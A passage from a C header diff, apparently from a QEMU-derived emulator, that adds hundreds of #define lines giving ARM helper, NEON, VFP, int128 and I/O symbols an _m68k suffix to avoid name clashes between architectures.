helper_iwmmxt_mulshw helper_iwmmxt_mulshw_m68k +#define helper_iwmmxt_mulslw helper_iwmmxt_mulslw_m68k +#define helper_iwmmxt_muluhw helper_iwmmxt_muluhw_m68k +#define helper_iwmmxt_mululw helper_iwmmxt_mululw_m68k +#define helper_iwmmxt_packsl helper_iwmmxt_packsl_m68k +#define helper_iwmmxt_packsq helper_iwmmxt_packsq_m68k +#define helper_iwmmxt_packsw helper_iwmmxt_packsw_m68k +#define helper_iwmmxt_packul helper_iwmmxt_packul_m68k +#define helper_iwmmxt_packuq helper_iwmmxt_packuq_m68k +#define helper_iwmmxt_packuw helper_iwmmxt_packuw_m68k +#define helper_iwmmxt_rorl helper_iwmmxt_rorl_m68k +#define helper_iwmmxt_rorq helper_iwmmxt_rorq_m68k +#define helper_iwmmxt_rorw helper_iwmmxt_rorw_m68k +#define helper_iwmmxt_sadb helper_iwmmxt_sadb_m68k +#define helper_iwmmxt_sadw helper_iwmmxt_sadw_m68k +#define helper_iwmmxt_setpsr_nz helper_iwmmxt_setpsr_nz_m68k +#define helper_iwmmxt_shufh helper_iwmmxt_shufh_m68k +#define helper_iwmmxt_slll helper_iwmmxt_slll_m68k +#define helper_iwmmxt_sllq helper_iwmmxt_sllq_m68k +#define helper_iwmmxt_sllw helper_iwmmxt_sllw_m68k +#define helper_iwmmxt_sral helper_iwmmxt_sral_m68k +#define helper_iwmmxt_sraq helper_iwmmxt_sraq_m68k +#define helper_iwmmxt_sraw helper_iwmmxt_sraw_m68k +#define helper_iwmmxt_srll helper_iwmmxt_srll_m68k +#define helper_iwmmxt_srlq helper_iwmmxt_srlq_m68k +#define helper_iwmmxt_srlw helper_iwmmxt_srlw_m68k +#define helper_iwmmxt_subnb helper_iwmmxt_subnb_m68k +#define helper_iwmmxt_subnl helper_iwmmxt_subnl_m68k +#define helper_iwmmxt_subnw helper_iwmmxt_subnw_m68k +#define helper_iwmmxt_subsb helper_iwmmxt_subsb_m68k +#define helper_iwmmxt_subsl helper_iwmmxt_subsl_m68k +#define helper_iwmmxt_subsw helper_iwmmxt_subsw_m68k +#define helper_iwmmxt_subub helper_iwmmxt_subub_m68k +#define helper_iwmmxt_subul helper_iwmmxt_subul_m68k +#define helper_iwmmxt_subuw helper_iwmmxt_subuw_m68k +#define helper_iwmmxt_unpackhb helper_iwmmxt_unpackhb_m68k +#define helper_iwmmxt_unpackhl helper_iwmmxt_unpackhl_m68k +#define helper_iwmmxt_unpackhsb helper_iwmmxt_unpackhsb_m68k +#define helper_iwmmxt_unpackhsl helper_iwmmxt_unpackhsl_m68k +#define helper_iwmmxt_unpackhsw helper_iwmmxt_unpackhsw_m68k +#define helper_iwmmxt_unpackhub helper_iwmmxt_unpackhub_m68k +#define helper_iwmmxt_unpackhul helper_iwmmxt_unpackhul_m68k +#define helper_iwmmxt_unpackhuw helper_iwmmxt_unpackhuw_m68k +#define helper_iwmmxt_unpackhw helper_iwmmxt_unpackhw_m68k +#define helper_iwmmxt_unpacklb helper_iwmmxt_unpacklb_m68k +#define helper_iwmmxt_unpackll helper_iwmmxt_unpackll_m68k +#define helper_iwmmxt_unpacklsb helper_iwmmxt_unpacklsb_m68k +#define helper_iwmmxt_unpacklsl helper_iwmmxt_unpacklsl_m68k +#define helper_iwmmxt_unpacklsw helper_iwmmxt_unpacklsw_m68k +#define helper_iwmmxt_unpacklub helper_iwmmxt_unpacklub_m68k +#define helper_iwmmxt_unpacklul helper_iwmmxt_unpacklul_m68k +#define helper_iwmmxt_unpackluw helper_iwmmxt_unpackluw_m68k +#define helper_iwmmxt_unpacklw helper_iwmmxt_unpacklw_m68k +#define helper_ldb_cmmu helper_ldb_cmmu_m68k +#define helper_ldb_mmu helper_ldb_mmu_m68k +#define helper_ldl_cmmu helper_ldl_cmmu_m68k +#define helper_ldl_mmu helper_ldl_mmu_m68k +#define helper_ldq_cmmu helper_ldq_cmmu_m68k +#define helper_ldq_mmu helper_ldq_mmu_m68k +#define helper_ldw_cmmu helper_ldw_cmmu_m68k +#define helper_ldw_mmu helper_ldw_mmu_m68k +#define helper_le_ldl_cmmu helper_le_ldl_cmmu_m68k +#define helper_le_ldq_cmmu helper_le_ldq_cmmu_m68k +#define helper_le_ldq_mmu helper_le_ldq_mmu_m68k +#define helper_le_ldsl_mmu helper_le_ldsl_mmu_m68k +#define helper_le_ldsw_mmu helper_le_ldsw_mmu_m68k +#define helper_le_ldul_mmu helper_le_ldul_mmu_m68k +#define helper_le_lduw_mmu helper_le_lduw_mmu_m68k +#define helper_le_ldw_cmmu helper_le_ldw_cmmu_m68k +#define helper_le_stl_mmu helper_le_stl_mmu_m68k +#define helper_le_stq_mmu helper_le_stq_mmu_m68k +#define helper_le_stw_mmu helper_le_stw_mmu_m68k +#define helper_msr_i_pstate helper_msr_i_pstate_m68k +#define helper_neon_abd_f32 helper_neon_abd_f32_m68k +#define helper_neon_abdl_s16 helper_neon_abdl_s16_m68k +#define helper_neon_abdl_s32 helper_neon_abdl_s32_m68k +#define helper_neon_abdl_s64 helper_neon_abdl_s64_m68k +#define helper_neon_abdl_u16 helper_neon_abdl_u16_m68k +#define helper_neon_abdl_u32 helper_neon_abdl_u32_m68k +#define helper_neon_abdl_u64 helper_neon_abdl_u64_m68k +#define helper_neon_abd_s16 helper_neon_abd_s16_m68k +#define helper_neon_abd_s32 helper_neon_abd_s32_m68k +#define helper_neon_abd_s8 helper_neon_abd_s8_m68k +#define helper_neon_abd_u16 helper_neon_abd_u16_m68k +#define helper_neon_abd_u32 helper_neon_abd_u32_m68k +#define helper_neon_abd_u8 helper_neon_abd_u8_m68k +#define helper_neon_abs_s16 helper_neon_abs_s16_m68k +#define helper_neon_abs_s8 helper_neon_abs_s8_m68k +#define helper_neon_acge_f32 helper_neon_acge_f32_m68k +#define helper_neon_acge_f64 helper_neon_acge_f64_m68k +#define helper_neon_acgt_f32 helper_neon_acgt_f32_m68k +#define helper_neon_acgt_f64 helper_neon_acgt_f64_m68k +#define helper_neon_addl_saturate_s32 helper_neon_addl_saturate_s32_m68k +#define helper_neon_addl_saturate_s64 helper_neon_addl_saturate_s64_m68k +#define helper_neon_addl_u16 helper_neon_addl_u16_m68k +#define helper_neon_addl_u32 helper_neon_addl_u32_m68k +#define helper_neon_add_u16 helper_neon_add_u16_m68k +#define helper_neon_add_u8 helper_neon_add_u8_m68k +#define helper_neon_ceq_f32 helper_neon_ceq_f32_m68k +#define helper_neon_ceq_u16 helper_neon_ceq_u16_m68k +#define helper_neon_ceq_u32 helper_neon_ceq_u32_m68k +#define helper_neon_ceq_u8 helper_neon_ceq_u8_m68k +#define helper_neon_cge_f32 helper_neon_cge_f32_m68k +#define helper_neon_cge_s16 helper_neon_cge_s16_m68k +#define helper_neon_cge_s32 helper_neon_cge_s32_m68k +#define helper_neon_cge_s8 helper_neon_cge_s8_m68k +#define helper_neon_cge_u16 helper_neon_cge_u16_m68k +#define helper_neon_cge_u32 helper_neon_cge_u32_m68k +#define helper_neon_cge_u8 helper_neon_cge_u8_m68k +#define helper_neon_cgt_f32 helper_neon_cgt_f32_m68k +#define helper_neon_cgt_s16 helper_neon_cgt_s16_m68k +#define helper_neon_cgt_s32 helper_neon_cgt_s32_m68k +#define helper_neon_cgt_s8 helper_neon_cgt_s8_m68k +#define helper_neon_cgt_u16 helper_neon_cgt_u16_m68k +#define helper_neon_cgt_u32 helper_neon_cgt_u32_m68k +#define helper_neon_cgt_u8 helper_neon_cgt_u8_m68k +#define helper_neon_cls_s16 helper_neon_cls_s16_m68k +#define helper_neon_cls_s32 helper_neon_cls_s32_m68k +#define helper_neon_cls_s8 helper_neon_cls_s8_m68k +#define helper_neon_clz_u16 helper_neon_clz_u16_m68k +#define helper_neon_clz_u8 helper_neon_clz_u8_m68k +#define helper_neon_cnt_u8 helper_neon_cnt_u8_m68k +#define helper_neon_fcvt_f16_to_f32 helper_neon_fcvt_f16_to_f32_m68k +#define helper_neon_fcvt_f32_to_f16 helper_neon_fcvt_f32_to_f16_m68k +#define helper_neon_hadd_s16 helper_neon_hadd_s16_m68k +#define helper_neon_hadd_s32 helper_neon_hadd_s32_m68k +#define helper_neon_hadd_s8 helper_neon_hadd_s8_m68k +#define helper_neon_hadd_u16 helper_neon_hadd_u16_m68k +#define helper_neon_hadd_u32 helper_neon_hadd_u32_m68k +#define helper_neon_hadd_u8 helper_neon_hadd_u8_m68k +#define helper_neon_hsub_s16 helper_neon_hsub_s16_m68k +#define helper_neon_hsub_s32 helper_neon_hsub_s32_m68k +#define helper_neon_hsub_s8 helper_neon_hsub_s8_m68k +#define helper_neon_hsub_u16 helper_neon_hsub_u16_m68k +#define helper_neon_hsub_u32 helper_neon_hsub_u32_m68k +#define helper_neon_hsub_u8 helper_neon_hsub_u8_m68k +#define helper_neon_max_s16 helper_neon_max_s16_m68k +#define helper_neon_max_s32 helper_neon_max_s32_m68k +#define helper_neon_max_s8 helper_neon_max_s8_m68k +#define helper_neon_max_u16 helper_neon_max_u16_m68k +#define helper_neon_max_u32 helper_neon_max_u32_m68k +#define helper_neon_max_u8 helper_neon_max_u8_m68k +#define helper_neon_min_s16 helper_neon_min_s16_m68k +#define helper_neon_min_s32 helper_neon_min_s32_m68k +#define helper_neon_min_s8 helper_neon_min_s8_m68k +#define helper_neon_min_u16 helper_neon_min_u16_m68k +#define helper_neon_min_u32 helper_neon_min_u32_m68k +#define helper_neon_min_u8 helper_neon_min_u8_m68k +#define helper_neon_mull_p8 helper_neon_mull_p8_m68k +#define helper_neon_mull_s16 helper_neon_mull_s16_m68k +#define helper_neon_mull_s8 helper_neon_mull_s8_m68k +#define helper_neon_mull_u16 helper_neon_mull_u16_m68k +#define helper_neon_mull_u8 helper_neon_mull_u8_m68k +#define helper_neon_mul_p8 helper_neon_mul_p8_m68k +#define helper_neon_mul_u16 helper_neon_mul_u16_m68k +#define helper_neon_mul_u8 helper_neon_mul_u8_m68k +#define helper_neon_narrow_high_u16 helper_neon_narrow_high_u16_m68k +#define helper_neon_narrow_high_u8 helper_neon_narrow_high_u8_m68k +#define helper_neon_narrow_round_high_u16 helper_neon_narrow_round_high_u16_m68k +#define helper_neon_narrow_round_high_u8 helper_neon_narrow_round_high_u8_m68k +#define helper_neon_narrow_sat_s16 helper_neon_narrow_sat_s16_m68k +#define helper_neon_narrow_sat_s32 helper_neon_narrow_sat_s32_m68k +#define helper_neon_narrow_sat_s8 helper_neon_narrow_sat_s8_m68k +#define helper_neon_narrow_sat_u16 helper_neon_narrow_sat_u16_m68k +#define helper_neon_narrow_sat_u32 helper_neon_narrow_sat_u32_m68k +#define helper_neon_narrow_sat_u8 helper_neon_narrow_sat_u8_m68k +#define helper_neon_narrow_u16 helper_neon_narrow_u16_m68k +#define helper_neon_narrow_u8 helper_neon_narrow_u8_m68k +#define helper_neon_negl_u16 helper_neon_negl_u16_m68k +#define helper_neon_negl_u32 helper_neon_negl_u32_m68k +#define helper_neon_paddl_u16 helper_neon_paddl_u16_m68k +#define helper_neon_paddl_u32 helper_neon_paddl_u32_m68k +#define helper_neon_padd_u16 helper_neon_padd_u16_m68k +#define helper_neon_padd_u8 helper_neon_padd_u8_m68k +#define helper_neon_pmax_s16 helper_neon_pmax_s16_m68k +#define helper_neon_pmax_s8 helper_neon_pmax_s8_m68k +#define helper_neon_pmax_u16 helper_neon_pmax_u16_m68k +#define helper_neon_pmax_u8 helper_neon_pmax_u8_m68k +#define helper_neon_pmin_s16 helper_neon_pmin_s16_m68k +#define helper_neon_pmin_s8 helper_neon_pmin_s8_m68k +#define helper_neon_pmin_u16 helper_neon_pmin_u16_m68k +#define helper_neon_pmin_u8 helper_neon_pmin_u8_m68k +#define helper_neon_pmull_64_hi helper_neon_pmull_64_hi_m68k +#define helper_neon_pmull_64_lo helper_neon_pmull_64_lo_m68k +#define helper_neon_qabs_s16 helper_neon_qabs_s16_m68k +#define helper_neon_qabs_s32 helper_neon_qabs_s32_m68k +#define helper_neon_qabs_s64 helper_neon_qabs_s64_m68k +#define helper_neon_qabs_s8 helper_neon_qabs_s8_m68k +#define helper_neon_qadd_s16 helper_neon_qadd_s16_m68k +#define helper_neon_qadd_s32 helper_neon_qadd_s32_m68k +#define helper_neon_qadd_s64 helper_neon_qadd_s64_m68k +#define helper_neon_qadd_s8 helper_neon_qadd_s8_m68k +#define helper_neon_qadd_u16 helper_neon_qadd_u16_m68k +#define helper_neon_qadd_u32 helper_neon_qadd_u32_m68k +#define helper_neon_qadd_u64 helper_neon_qadd_u64_m68k +#define helper_neon_qadd_u8 helper_neon_qadd_u8_m68k +#define helper_neon_qdmulh_s16 helper_neon_qdmulh_s16_m68k +#define helper_neon_qdmulh_s32 helper_neon_qdmulh_s32_m68k +#define helper_neon_qneg_s16 helper_neon_qneg_s16_m68k +#define helper_neon_qneg_s32 helper_neon_qneg_s32_m68k +#define helper_neon_qneg_s64 helper_neon_qneg_s64_m68k +#define helper_neon_qneg_s8 helper_neon_qneg_s8_m68k +#define helper_neon_qrdmulh_s16 helper_neon_qrdmulh_s16_m68k +#define helper_neon_qrdmulh_s32 helper_neon_qrdmulh_s32_m68k +#define helper_neon_qrshl_s16 helper_neon_qrshl_s16_m68k +#define helper_neon_qrshl_s32 helper_neon_qrshl_s32_m68k +#define helper_neon_qrshl_s64 helper_neon_qrshl_s64_m68k +#define helper_neon_qrshl_s8 helper_neon_qrshl_s8_m68k +#define helper_neon_qrshl_u16 helper_neon_qrshl_u16_m68k +#define helper_neon_qrshl_u32 helper_neon_qrshl_u32_m68k +#define helper_neon_qrshl_u64 helper_neon_qrshl_u64_m68k +#define helper_neon_qrshl_u8 helper_neon_qrshl_u8_m68k +#define helper_neon_qshl_s16 helper_neon_qshl_s16_m68k +#define helper_neon_qshl_s32 helper_neon_qshl_s32_m68k +#define helper_neon_qshl_s64 helper_neon_qshl_s64_m68k +#define helper_neon_qshl_s8 helper_neon_qshl_s8_m68k +#define helper_neon_qshl_u16 helper_neon_qshl_u16_m68k +#define helper_neon_qshl_u32 helper_neon_qshl_u32_m68k +#define helper_neon_qshl_u64 helper_neon_qshl_u64_m68k +#define helper_neon_qshl_u8 helper_neon_qshl_u8_m68k +#define helper_neon_qshlu_s16 helper_neon_qshlu_s16_m68k +#define helper_neon_qshlu_s32 helper_neon_qshlu_s32_m68k +#define helper_neon_qshlu_s64 helper_neon_qshlu_s64_m68k +#define helper_neon_qshlu_s8 helper_neon_qshlu_s8_m68k +#define helper_neon_qsub_s16 helper_neon_qsub_s16_m68k +#define helper_neon_qsub_s32 helper_neon_qsub_s32_m68k +#define helper_neon_qsub_s64 helper_neon_qsub_s64_m68k +#define helper_neon_qsub_s8 helper_neon_qsub_s8_m68k +#define helper_neon_qsub_u16 helper_neon_qsub_u16_m68k +#define helper_neon_qsub_u32 helper_neon_qsub_u32_m68k +#define helper_neon_qsub_u64 helper_neon_qsub_u64_m68k +#define helper_neon_qsub_u8 helper_neon_qsub_u8_m68k +#define helper_neon_qunzip16 helper_neon_qunzip16_m68k +#define helper_neon_qunzip32 helper_neon_qunzip32_m68k +#define helper_neon_qunzip8 helper_neon_qunzip8_m68k +#define helper_neon_qzip16 helper_neon_qzip16_m68k +#define helper_neon_qzip32 helper_neon_qzip32_m68k +#define helper_neon_qzip8 helper_neon_qzip8_m68k +#define helper_neon_rbit_u8 helper_neon_rbit_u8_m68k +#define helper_neon_rhadd_s16 helper_neon_rhadd_s16_m68k +#define helper_neon_rhadd_s32 helper_neon_rhadd_s32_m68k +#define helper_neon_rhadd_s8 helper_neon_rhadd_s8_m68k +#define helper_neon_rhadd_u16 helper_neon_rhadd_u16_m68k +#define helper_neon_rhadd_u32 helper_neon_rhadd_u32_m68k +#define helper_neon_rhadd_u8 helper_neon_rhadd_u8_m68k +#define helper_neon_rshl_s16 helper_neon_rshl_s16_m68k +#define helper_neon_rshl_s32 helper_neon_rshl_s32_m68k +#define helper_neon_rshl_s64 helper_neon_rshl_s64_m68k +#define helper_neon_rshl_s8 helper_neon_rshl_s8_m68k +#define helper_neon_rshl_u16 helper_neon_rshl_u16_m68k +#define helper_neon_rshl_u32 helper_neon_rshl_u32_m68k +#define helper_neon_rshl_u64 helper_neon_rshl_u64_m68k +#define helper_neon_rshl_u8 helper_neon_rshl_u8_m68k +#define helper_neon_shl_s16 helper_neon_shl_s16_m68k +#define helper_neon_shl_s32 helper_neon_shl_s32_m68k +#define helper_neon_shl_s64 helper_neon_shl_s64_m68k +#define helper_neon_shl_s8 helper_neon_shl_s8_m68k +#define helper_neon_shl_u16 helper_neon_shl_u16_m68k +#define helper_neon_shl_u32 helper_neon_shl_u32_m68k +#define helper_neon_shl_u64 helper_neon_shl_u64_m68k +#define helper_neon_shl_u8 helper_neon_shl_u8_m68k +#define helper_neon_sqadd_u16 helper_neon_sqadd_u16_m68k +#define helper_neon_sqadd_u32 helper_neon_sqadd_u32_m68k +#define helper_neon_sqadd_u64 helper_neon_sqadd_u64_m68k +#define helper_neon_sqadd_u8 helper_neon_sqadd_u8_m68k +#define helper_neon_subl_u16 helper_neon_subl_u16_m68k +#define helper_neon_subl_u32 helper_neon_subl_u32_m68k +#define helper_neon_sub_u16 helper_neon_sub_u16_m68k +#define helper_neon_sub_u8 helper_neon_sub_u8_m68k +#define helper_neon_tbl helper_neon_tbl_m68k +#define helper_neon_tst_u16 helper_neon_tst_u16_m68k +#define helper_neon_tst_u32 helper_neon_tst_u32_m68k +#define helper_neon_tst_u8 helper_neon_tst_u8_m68k +#define helper_neon_unarrow_sat16 helper_neon_unarrow_sat16_m68k +#define helper_neon_unarrow_sat32 helper_neon_unarrow_sat32_m68k +#define helper_neon_unarrow_sat8 helper_neon_unarrow_sat8_m68k +#define helper_neon_unzip16 helper_neon_unzip16_m68k +#define helper_neon_unzip8 helper_neon_unzip8_m68k +#define helper_neon_uqadd_s16 helper_neon_uqadd_s16_m68k +#define helper_neon_uqadd_s32 helper_neon_uqadd_s32_m68k +#define helper_neon_uqadd_s64 helper_neon_uqadd_s64_m68k +#define helper_neon_uqadd_s8 helper_neon_uqadd_s8_m68k +#define helper_neon_widen_s16 helper_neon_widen_s16_m68k +#define helper_neon_widen_s8 helper_neon_widen_s8_m68k +#define helper_neon_widen_u16 helper_neon_widen_u16_m68k +#define helper_neon_widen_u8 helper_neon_widen_u8_m68k +#define helper_neon_zip16 helper_neon_zip16_m68k +#define helper_neon_zip8 helper_neon_zip8_m68k +#define helper_pre_hvc helper_pre_hvc_m68k +#define helper_pre_smc helper_pre_smc_m68k +#define helper_qadd16 helper_qadd16_m68k +#define helper_qadd8 helper_qadd8_m68k +#define helper_qaddsubx helper_qaddsubx_m68k +#define helper_qsub16 helper_qsub16_m68k +#define helper_qsub8 helper_qsub8_m68k +#define helper_qsubaddx helper_qsubaddx_m68k +#define helper_rbit helper_rbit_m68k +#define helper_recpe_f32 helper_recpe_f32_m68k +#define helper_recpe_f64 helper_recpe_f64_m68k +#define helper_recpe_u32 helper_recpe_u32_m68k +#define helper_recps_f32 helper_recps_f32_m68k +#define helper_ret_ldb_cmmu helper_ret_ldb_cmmu_m68k +#define helper_ret_ldsb_mmu helper_ret_ldsb_mmu_m68k +#define helper_ret_ldub_mmu helper_ret_ldub_mmu_m68k +#define helper_ret_stb_mmu helper_ret_stb_mmu_m68k +#define helper_rintd helper_rintd_m68k +#define helper_rintd_exact helper_rintd_exact_m68k +#define helper_rints helper_rints_m68k +#define helper_rints_exact helper_rints_exact_m68k +#define helper_ror_cc helper_ror_cc_m68k +#define helper_rsqrte_f32 helper_rsqrte_f32_m68k +#define helper_rsqrte_f64 helper_rsqrte_f64_m68k +#define helper_rsqrte_u32 helper_rsqrte_u32_m68k +#define helper_rsqrts_f32 helper_rsqrts_f32_m68k +#define helper_sadd16 helper_sadd16_m68k +#define helper_sadd8 helper_sadd8_m68k +#define helper_saddsubx helper_saddsubx_m68k +#define helper_sar_cc helper_sar_cc_m68k +#define helper_sdiv helper_sdiv_m68k +#define helper_sel_flags helper_sel_flags_m68k +#define helper_set_cp_reg helper_set_cp_reg_m68k +#define helper_set_cp_reg64 helper_set_cp_reg64_m68k +#define helper_set_neon_rmode helper_set_neon_rmode_m68k +#define helper_set_r13_banked helper_set_r13_banked_m68k +#define helper_set_rmode helper_set_rmode_m68k +#define helper_set_user_reg helper_set_user_reg_m68k +#define helper_shadd16 helper_shadd16_m68k +#define helper_shadd8 helper_shadd8_m68k +#define helper_shaddsubx helper_shaddsubx_m68k +#define helper_shl_cc helper_shl_cc_m68k +#define helper_shr_cc helper_shr_cc_m68k +#define helper_shsub16 helper_shsub16_m68k +#define helper_shsub8 helper_shsub8_m68k +#define helper_shsubaddx helper_shsubaddx_m68k +#define helper_ssat helper_ssat_m68k +#define helper_ssat16 helper_ssat16_m68k +#define helper_ssub16 helper_ssub16_m68k +#define helper_ssub8 helper_ssub8_m68k +#define helper_ssubaddx helper_ssubaddx_m68k +#define helper_stb_mmu helper_stb_mmu_m68k +#define helper_stl_mmu helper_stl_mmu_m68k +#define helper_stq_mmu helper_stq_mmu_m68k +#define helper_stw_mmu helper_stw_mmu_m68k +#define helper_sub_saturate helper_sub_saturate_m68k +#define helper_sub_usaturate helper_sub_usaturate_m68k +#define helper_sxtb16 helper_sxtb16_m68k +#define helper_uadd16 helper_uadd16_m68k +#define helper_uadd8 helper_uadd8_m68k +#define helper_uaddsubx helper_uaddsubx_m68k +#define helper_udiv helper_udiv_m68k +#define helper_uhadd16 helper_uhadd16_m68k +#define helper_uhadd8 helper_uhadd8_m68k +#define helper_uhaddsubx helper_uhaddsubx_m68k +#define helper_uhsub16 helper_uhsub16_m68k +#define helper_uhsub8 helper_uhsub8_m68k +#define helper_uhsubaddx helper_uhsubaddx_m68k +#define helper_uqadd16 helper_uqadd16_m68k +#define helper_uqadd8 helper_uqadd8_m68k +#define helper_uqaddsubx helper_uqaddsubx_m68k +#define helper_uqsub16 helper_uqsub16_m68k +#define helper_uqsub8 helper_uqsub8_m68k +#define helper_uqsubaddx helper_uqsubaddx_m68k +#define helper_usad8 helper_usad8_m68k +#define helper_usat helper_usat_m68k +#define helper_usat16 helper_usat16_m68k +#define helper_usub16 helper_usub16_m68k +#define helper_usub8 helper_usub8_m68k +#define helper_usubaddx helper_usubaddx_m68k +#define helper_uxtb16 helper_uxtb16_m68k +#define helper_v7m_mrs helper_v7m_mrs_m68k +#define helper_v7m_msr helper_v7m_msr_m68k +#define helper_vfp_absd helper_vfp_absd_m68k +#define helper_vfp_abss helper_vfp_abss_m68k +#define helper_vfp_addd helper_vfp_addd_m68k +#define helper_vfp_adds helper_vfp_adds_m68k +#define helper_vfp_cmpd helper_vfp_cmpd_m68k +#define helper_vfp_cmped helper_vfp_cmped_m68k +#define helper_vfp_cmpes helper_vfp_cmpes_m68k +#define helper_vfp_cmps helper_vfp_cmps_m68k +#define helper_vfp_divd helper_vfp_divd_m68k +#define helper_vfp_divs helper_vfp_divs_m68k +#define helper_vfp_fcvtds helper_vfp_fcvtds_m68k +#define helper_vfp_fcvt_f16_to_f32 helper_vfp_fcvt_f16_to_f32_m68k +#define helper_vfp_fcvt_f16_to_f64 helper_vfp_fcvt_f16_to_f64_m68k +#define helper_vfp_fcvt_f32_to_f16 helper_vfp_fcvt_f32_to_f16_m68k +#define helper_vfp_fcvt_f64_to_f16 helper_vfp_fcvt_f64_to_f16_m68k +#define helper_vfp_fcvtsd helper_vfp_fcvtsd_m68k +#define helper_vfp_get_fpscr helper_vfp_get_fpscr_m68k +#define helper_vfp_maxd helper_vfp_maxd_m68k +#define helper_vfp_maxnumd helper_vfp_maxnumd_m68k +#define helper_vfp_maxnums helper_vfp_maxnums_m68k +#define helper_vfp_maxs helper_vfp_maxs_m68k +#define helper_vfp_mind helper_vfp_mind_m68k +#define helper_vfp_minnumd helper_vfp_minnumd_m68k +#define helper_vfp_minnums helper_vfp_minnums_m68k +#define helper_vfp_mins helper_vfp_mins_m68k +#define helper_vfp_muladdd helper_vfp_muladdd_m68k +#define helper_vfp_muladds helper_vfp_muladds_m68k +#define helper_vfp_muld helper_vfp_muld_m68k +#define helper_vfp_muls helper_vfp_muls_m68k +#define helper_vfp_negd helper_vfp_negd_m68k +#define helper_vfp_negs helper_vfp_negs_m68k +#define helper_vfp_set_fpscr helper_vfp_set_fpscr_m68k +#define helper_vfp_shtod helper_vfp_shtod_m68k +#define helper_vfp_shtos helper_vfp_shtos_m68k +#define helper_vfp_sitod helper_vfp_sitod_m68k +#define helper_vfp_sitos helper_vfp_sitos_m68k +#define helper_vfp_sltod helper_vfp_sltod_m68k +#define helper_vfp_sltos helper_vfp_sltos_m68k +#define helper_vfp_sqrtd helper_vfp_sqrtd_m68k +#define helper_vfp_sqrts helper_vfp_sqrts_m68k +#define helper_vfp_sqtod helper_vfp_sqtod_m68k +#define helper_vfp_sqtos helper_vfp_sqtos_m68k +#define helper_vfp_subd helper_vfp_subd_m68k +#define helper_vfp_subs helper_vfp_subs_m68k +#define helper_vfp_toshd helper_vfp_toshd_m68k +#define helper_vfp_toshd_round_to_zero helper_vfp_toshd_round_to_zero_m68k +#define helper_vfp_toshs helper_vfp_toshs_m68k +#define helper_vfp_toshs_round_to_zero helper_vfp_toshs_round_to_zero_m68k +#define helper_vfp_tosid helper_vfp_tosid_m68k +#define helper_vfp_tosis helper_vfp_tosis_m68k +#define helper_vfp_tosizd helper_vfp_tosizd_m68k +#define helper_vfp_tosizs helper_vfp_tosizs_m68k +#define helper_vfp_tosld helper_vfp_tosld_m68k +#define helper_vfp_tosld_round_to_zero helper_vfp_tosld_round_to_zero_m68k +#define helper_vfp_tosls helper_vfp_tosls_m68k +#define helper_vfp_tosls_round_to_zero helper_vfp_tosls_round_to_zero_m68k +#define helper_vfp_tosqd helper_vfp_tosqd_m68k +#define helper_vfp_tosqs helper_vfp_tosqs_m68k +#define helper_vfp_touhd helper_vfp_touhd_m68k +#define helper_vfp_touhd_round_to_zero helper_vfp_touhd_round_to_zero_m68k +#define helper_vfp_touhs helper_vfp_touhs_m68k +#define helper_vfp_touhs_round_to_zero helper_vfp_touhs_round_to_zero_m68k +#define helper_vfp_touid helper_vfp_touid_m68k +#define helper_vfp_touis helper_vfp_touis_m68k +#define helper_vfp_touizd helper_vfp_touizd_m68k +#define helper_vfp_touizs helper_vfp_touizs_m68k +#define helper_vfp_tould helper_vfp_tould_m68k +#define helper_vfp_tould_round_to_zero helper_vfp_tould_round_to_zero_m68k +#define helper_vfp_touls helper_vfp_touls_m68k +#define helper_vfp_touls_round_to_zero helper_vfp_touls_round_to_zero_m68k +#define helper_vfp_touqd helper_vfp_touqd_m68k +#define helper_vfp_touqs helper_vfp_touqs_m68k +#define helper_vfp_uhtod helper_vfp_uhtod_m68k +#define helper_vfp_uhtos helper_vfp_uhtos_m68k +#define helper_vfp_uitod helper_vfp_uitod_m68k +#define helper_vfp_uitos helper_vfp_uitos_m68k +#define helper_vfp_ultod helper_vfp_ultod_m68k +#define helper_vfp_ultos helper_vfp_ultos_m68k +#define helper_vfp_uqtod helper_vfp_uqtod_m68k +#define helper_vfp_uqtos helper_vfp_uqtos_m68k +#define helper_wfe helper_wfe_m68k +#define helper_wfi helper_wfi_m68k +#define hex2decimal hex2decimal_m68k +#define hw_breakpoint_update hw_breakpoint_update_m68k +#define hw_breakpoint_update_all hw_breakpoint_update_all_m68k +#define hw_watchpoint_update hw_watchpoint_update_m68k +#define hw_watchpoint_update_all hw_watchpoint_update_all_m68k +#define _init _init_m68k +#define init_cpreg_list init_cpreg_list_m68k +#define init_lists init_lists_m68k +#define input_type_enum input_type_enum_m68k +#define int128_2_64 int128_2_64_m68k +#define int128_add int128_add_m68k +#define int128_addto int128_addto_m68k +#define int128_and int128_and_m68k +#define int128_eq int128_eq_m68k +#define int128_ge int128_ge_m68k +#define int128_get64 int128_get64_m68k +#define int128_gt int128_gt_m68k +#define int128_le int128_le_m68k +#define int128_lt int128_lt_m68k +#define int128_make64 int128_make64_m68k +#define int128_max int128_max_m68k +#define int128_min int128_min_m68k +#define int128_ne int128_ne_m68k +#define int128_neg int128_neg_m68k +#define int128_nz int128_nz_m68k +#define int128_rshift int128_rshift_m68k +#define int128_sub int128_sub_m68k +#define int128_subfrom int128_subfrom_m68k +#define int128_zero int128_zero_m68k +#define int16_to_float32 int16_to_float32_m68k +#define int16_to_float64 int16_to_float64_m68k +#define int32_to_float128 int32_to_float128_m68k +#define int32_to_float32 int32_to_float32_m68k +#define int32_to_float64 int32_to_float64_m68k +#define int32_to_floatx80 int32_to_floatx80_m68k +#define int64_to_float128 int64_to_float128_m68k +#define int64_to_float32 int64_to_float32_m68k +#define int64_to_float64 int64_to_float64_m68k +#define int64_to_floatx80 int64_to_floatx80_m68k +#define invalidate_and_set_dirty invalidate_and_set_dirty_m68k +#define invalidate_page_bitmap invalidate_page_bitmap_m68k +#define io_mem_read io_mem_read_m68k +#define io_mem_write io_mem_write_m68k +#define io_readb io_readb_m68k +#define io_readl io_readl_m68k +#define io_readq io_readq_m68k +#define io_readw io_readw_m68k +#define iotlb_to_region iotlb_to_region_m68k +#define io_writeb io_writeb_m68k +#define io_writel io_writel_m68k +#define io_writeq io_writeq_m68k +#define io_writew io_writew_m68k +#define is_a64 is_a64_m68k +#define is_help_option is_help_option_m68k +#define isr_read isr_read_m68k +#define is_valid_option_list is_valid_option_list_m68k +#define iwmmxt_load_creg iwmmxt_load_creg_m68k +#define iwmmxt_load_reg iwmmxt_load_reg_m68k +#define iwmmxt_store_creg iwmmxt_store_creg_m68k +#define iwmmxt_store_reg iwmmxt_store_reg_m68k +#define __jit_debug_descriptor __jit_debug_descriptor_m68k +#define __jit_debug_register_code __jit_debug_register_code_m68k +#define kvm_to_cpreg_id kvm_to_cpreg_id_m68k 